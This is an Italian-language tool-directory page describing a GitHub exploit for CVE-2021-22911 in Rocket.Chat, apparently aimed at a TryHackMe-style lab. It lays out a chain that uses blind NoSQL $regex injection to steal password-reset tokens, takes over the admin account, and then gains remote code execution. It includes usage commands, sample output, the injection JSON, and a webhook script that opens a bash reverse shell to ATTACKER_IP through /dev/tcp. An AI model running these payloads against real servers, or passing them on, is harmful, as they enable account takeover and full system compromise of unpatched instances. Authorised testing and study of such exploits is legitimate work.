Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
rocketcat-cve-2021-22911-exploit — CVE-2021-22911 Rocket.Chat NoSQL Injection RCE Exploit - Scopo Educativo | Kitploit
Strumenti/GitHubGitHub/roshanrajbanshi/rocketcat-cve-2021-22911-exploit
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneSviluppo Payload
GitHubroshanrajbanshi/rocketcat-cve-2021-22911-exploit

rocketcat-cve-2021-22911-exploit

CVE-2021-22911 Rocket.Chat NoSQL Injection RCE Exploit - Scopo Educativo

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
4 mesi faNon ancora revisionato

Exploit di Rocket.Chat CVE-2021-22911

⚠️ AVVERTENZA - SOLO PER USO EDUCATIVO

Questo exploit è destinato esclusivamente a test di penetrazione autorizzati e scopi educativi. L'accesso non autorizzato a sistemi informatici è illegale. L'autore non è responsabile per qualsiasi uso improprio.

📋 Panoramica

CVE-2021-22911 è una vulnerabilità critica di NoSQL injection non autenticata in Rocket.Chat che porta all'esecuzione di codice remoto (RCE).

  • Punteggio CVSS: 9.8 (Critico)
  • Versioni interessate: Rocket.Chat < 3.12.7
  • Vettore d'attacco: Rete / Non autenticato
  • Impatto: Compromissione completa del sistema

🎯 Dettagli della vulnerabilità

Questo exploit combina tre attacchi di NoSQL injection:

Fase 1: Reimpostazione della password di un utente con privilegi bassi

  • Invia una richiesta di password dimenticata per un utente con privilegi bassi
  • Utilizza l'iniezione NoSQL blind con l'operatore $regex per estrarre il token di reimpostazione della password carattere per carattere
  • Reimposta la password su un valore noto

Fase 2: Reimpostazione della password dell'amministratore

  • Ripete la Fase 1 ma prende di mira l'account amministratore
  • Estrae il token di reimpostazione della password dell'amministratore tramite iniezione NoSQL blind
  • Modifica la password dell'amministratore

Fase 3: Esecuzione di codice remoto

  • Si autentica come account amministratore compromesso
  • Crea un'integrazione webhook con payload JavaScript
  • Il payload utilizza child_process.exec() di Node.js per avviare una reverse shell
  • Attiva il webhook per eseguire la reverse shell

🛠️ Prerequisiti

root@kitploit:~
pip install requests

🚀 Utilizzo

1. Avvia il listener Netcat (Terminale 1)

root@kitploit:~
nc -lvnp 4444

2. Esegui l'exploit (Terminale 2)

Inserimento manuale dell'IP:

root@kitploit:~
python3 rocket_chat_exploit.py \
  -u [email protected] \
  -a [email protected] \
  -t http://chat.rocket.thm \
  -i 10.9.0.1 \
  -p 4444

Rilevamento automatico IP tun0 (Consigliato):

root@kitploit:~
python3 rocket_chat_exploit.py \
  -u [email protected] \
  -a [email protected] \
  -t http://chat.rocket.thm \
  -i $(ip a show tun0 | grep "inet " | awk '{print $2}' | cut -d/ -f1) \
  -p 4444

Argomenti:

  • -u: Email dell'utente con privilegi bassi (deve esistere)
  • -a: Email dell'amministratore
  • -t: URL del target (istanza Rocket.Chat)
  • -i: Il tuo IP attaccante (tun0)
  • -p: Porta del listener Netcat

Output di esempio

root@kitploit:~
============================================================
  Rocket.Chat CVE-2021-22911 — RCE
  Target : http://chat.rocket.thm
  Shell  : 10.9.0.1:4444
============================================================

[PHASE 1] Low-priv user → [email protected]
[+] Password reset email sent → [email protected]
[*] Extracting reset token via blind NoSQL injection...
    [43/43] aBcDeFgHiJkLmNoPqRsTuVwXyZ1234567890abcd
[+] Token: aBcDeFgHiJkLmNoPqRsTuVwXyZ1234567890abcd
[+] Password changed to: P@$$w0rd!1234

[PHASE 2] Admin user → [email protected]
[+] Password reset email sent → [email protected]
[*] Extracting reset token via blind NoSQL injection...
    [43/43] XyZ9876543210aBcDeFgHiJkLmNoPqRsTuVwXyZ
[+] Token: XyZ9876543210aBcDeFgHiJkLmNoPqRsTuVwXyZ
[+] Password changed to: P@$$w0rd!1234

[PHASE 3] RCE
[!] Start your listener now:  nc -lvnp 4444
[*] Press Enter when nc is ready...
[+] Authenticated as [email protected]
    userid : userid123456789
    token  : token123456...
[+] Webhook created
    http://chat.rocket.thm/hooks/hookid123/token456
[*] Triggering reverse shell...
[+] Trigger sent — check your nc listener

🔍 Dettagli tecnici

Formato del payload di NoSQL injection

root@kitploit:~
{
  "message": {
    "msg": "method",
    "method": "getPasswordPolicy",
    "params": [
      {
        "token": {
          "$regex": "^abc"
        }
      }
    ]
  }
}

Payload RCE (Script Webhook)

root@kitploit:~
class Script {
  process_incoming_request({ request }) {
    const require = console.log.constructor('return process.mainModule.require')();
    const { exec } = require('child_process');
    exec('bash -c "bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1"');
  }
}

📚 Riferimenti

  • Exploit originale: enox - Exploit-DB 50078, 50108
  • Analisi della vulnerabilità: Blog di SonarSource
  • Dettagli CVE: CVE-2021-22911

📝 Crediti

  • enox - Sviluppo exploit originale
  • SonarSource - Ricerca e analisi della vulnerabilità

⚖️ Avviso legale

Questo strumento è fornito esclusivamente per scopi educativi e test di sicurezza autorizzati. L'accesso non autorizzato a sistemi informatici è un reato penale ai sensi del Computer Fraud and Abuse Act (CFAA) e di leggi internazionali simili.


Usa responsabilmente. Testa solo sistemi di tua proprietà o per i quali hai esplicita autorizzazione scritta.

Scarica lo strumento